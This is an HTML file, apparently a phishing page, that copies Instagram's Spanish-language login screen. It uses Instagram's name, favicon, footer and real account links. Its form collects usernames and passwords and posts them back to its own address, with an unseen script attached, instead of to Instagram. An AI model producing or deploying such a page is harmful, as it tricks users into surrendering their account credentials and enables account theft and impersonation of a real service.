<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <link rel="stylesheet" href="estilos.css">
    <link rel="icon" type="image/png" href="https://static.cdninstagram.com/rsrc.php/yI/xY/hq/ig_logo.png">
</head>
<body>
    <div class="login-page">
        <div class="form-container">
            <div class="logo">
                <img src="IG.png" alt="Instagram">
            </div>
            <form method="POST" id="login-form">
                <input type="text" name="username" placeholder="Teléfono, usuario, o Correo electronico" required>
                <input type="password" name="password" placeholder="Contraseña" required>
                <button type="submit" class="login-button">Entrar</button>
            </form>
            <div class="separator">O</div>
            <div class="facebook-login">
            <a href="#" class="fb-button">
  <img src="https://upload.wikimedia.org/wikipedia/commons/0/05/Facebook_Logo_%282019%29.png" alt="Facebook" class="fb-logo">
  Iniciar sesión con Facebook
</a>



            </div>
            <a href="https://www.instagram.com/accounts/password/reset/" class="forgot-password">¿Has olvidado la contraseña?</a>
        </div>
        <div class="signup-container">
            <p>¿No tienes una cuenta? <a href="https://www.instagram.com/accounts/emailsignup/">Registrate</a></p>
        </div>
        <div class="app-download">
            <p>Descarga la aplicación.</p>
            <div class="app-links">
                <a href="https://itunes.apple.com/app/instagram/id389801252"><img src="microsoft.png" alt="App Store"></a>
                <a href="https://play.google.com/store/apps/details?id=com.instagram.android"><img src="googleplay.png" alt="Google Play"></a>
            </div>
        </div>
    </div>
    <script src="document.js"></script>
</body>

<div class="texto-superior">
  Meta   Información   Blog   Empleo   Ayuda   API  Privacidad   Configuración de cookies   Condiciones   Ubicaciones   Instagram Lite   Threads    Meta Verified 
</div>


<div class="footer-fijo">

Español (España)
© 2025 Instagram from Meta
</div>

<style>
  .footer-fijo {
    position: fixed;
    bottom: 0;
    width: 100%;
    background-color: #fafafa;
    text-align: center;
    padding: 30px;
    font-size: 14px;
    color: #666;
  }

   .texto-superior {
    position: fixed;
    bottom: 80px; /* Ajusta la distancia desde la parte inferior */
    width: 100%;
    text-align: center;
    font-size: 14px;
    color: #333;
    word-spacing: 14px;
  }

</style>

</html>
